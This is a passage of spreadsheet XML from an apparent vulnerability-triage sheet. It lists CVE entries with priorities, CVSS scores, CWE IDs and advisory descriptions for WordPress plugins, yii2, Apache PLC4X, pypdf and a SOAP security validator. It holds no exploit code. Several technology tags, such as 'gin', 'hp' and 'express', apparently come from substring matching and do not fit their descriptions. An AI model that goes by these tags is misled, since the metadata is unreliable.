          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-917</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>In the StAX streaming WS-SecurityPolicy validator, certain relative or unsupported XPath expressions can be converted into paths that never match the actual XML element path. A remote SOAP peer may therefore send a required element without the expected signature or encryption.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87830</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92966</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>The The Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The payload is planted during the unauthenticated booking flow and triggered when the Customer Cabinet block rendered by render_customer_dashboard() outputs the stored name into the content stream, where WordPress core's do_shortcode filter at priority 11 re-parses and executes it.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92966</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102377</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Photo Gallery by 10Web &lt;= 1.8.46 versions.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102377</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103474</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate file types in the backend storage upload actions, allowing authenticated managers to upload PHP files. Attackers with manager role can upload PHP scripts to the web-accessible storage directory and request them to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103474</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94076</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in SEO Plugin by Squirrly SEO &lt;= 14.2.5 versions.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94076</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94121</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in 10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer &lt;= 2.33.6 versions.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94121</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94678</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Go Live Update Urls &lt;= 7.0.8 versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94678</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94683</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in DesignSetGo &lt;= 2.8.0 versions.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94683</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95531</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in Conversational Forms for ChatBot &lt;= 1.5.0 versions.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95531</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96831</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Themify Builder &lt;= 7.8.1 versions.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96831</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97291</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.66 versions.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97291</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102509</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Memory Allocation with Excessive Size Value, Allocation of Resources Without Limits, and Uncontrolled Recursion in the Java implementation of Apache PLC4X (PLC4J) allow a malicious or impersonated device to exhaust the memory or stack of the client application, causing a denial of service.
In the OPC UA driver these defects are reachable before authentication: the offending data is parsed while the secure channel and session are being established, before the server's identity has been bound to it. Configuring a trusted server therefore does not prevent exploitation by an attacker who can 
impersonate it.
The individual defects are:
- Length-prefixed byte strings are allocated at the size claimed on the wire before the length is checked against the data actually received (0.10.0 through 0.13.1).
- Array fields in generated protocol parsers pre-allocate a list with the element count claimed on the wire, allowing a single count field to trigger a multi-gigabyte allocation. This parser is shared by all PLC4J drivers; the OPC UA driver is the verified pre-authentication path (0.10.0 through 0.13.1).
- The OPC UA driver accumulates message chunks without enforcing the negotiated maximum chunk count and message size (0.12.0 through 0.13.1).
- The OPC UA driver pre-allocates collections using element counts received from the server (0.10.0 through 0.13.1).
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Go implementation is covered by  CVE-2026-102510 https://cveprocess.apache.org/cve5/CVE-2026-102510 .
This issue affects Apache PLC4X: from 0.10.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102509</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102510</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-190, CWE-674, CWE-789</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow, Improper Validation of Array Index, Uncontrolled Recursion and Memory Allocation with Excessive Size Value in the Go implementation of Apache PLC4X (PLC4Go) allow a malicious device, or an attacker able to inject network traffic, to crash or exhaust the memory of the client application,
causing a denial of service.
The individual defects are:
- Generated parsers pre-allocate arrays with the element count claimed on the wire (0.13.0 through 0.13.1).
- Transport read helpers allocate buffers of the size claimed on the wire without an upper bound.
- ADS and KNXnet/IP response handling indexes into received data without checking its length, causing a panic.
- ADS and EIP frame-length handling accepts, or arithmetically wraps to, a length of zero, breaking message framing.
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Java implementation is covered by  CVE-2026-102509 https://cveprocess.apache.org/cve5/CVE-2026-102509 .
Additionally, length and position arithmetic in generated serializers was performed in 16-bit integers. If an application forwards attacker-influenced payloads larger than 8 KB, the length field wraps, and the remainder of the payload may be interpreted by the receiving device (for example, an ADS PLC) as 
additional, independent protocol messages.
This issue affects Apache PLC4X: from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102510</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102993</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.17.0, a crafted PDF can provide unusually large Roman page-label values that cause pypdf/_page_labels.py to generate excessively large numeral strings when an application retrieves document page labels, consuming large amounts of memory and potentially making the application unavailable. This issue is fixed in version 6.17.0.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102993</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102994</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.0, a crafted PDF containing indirect-object identifiers or generation-number tokens that continue for a long time without whitespace can cause pypdf/_reader.py and pypdf/generic/_base.py to scan excessive input through read_until_whitespace, resulting in long runtimes and application unavailability. This issue is fixed in version 6.18.0.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102994</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102995</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
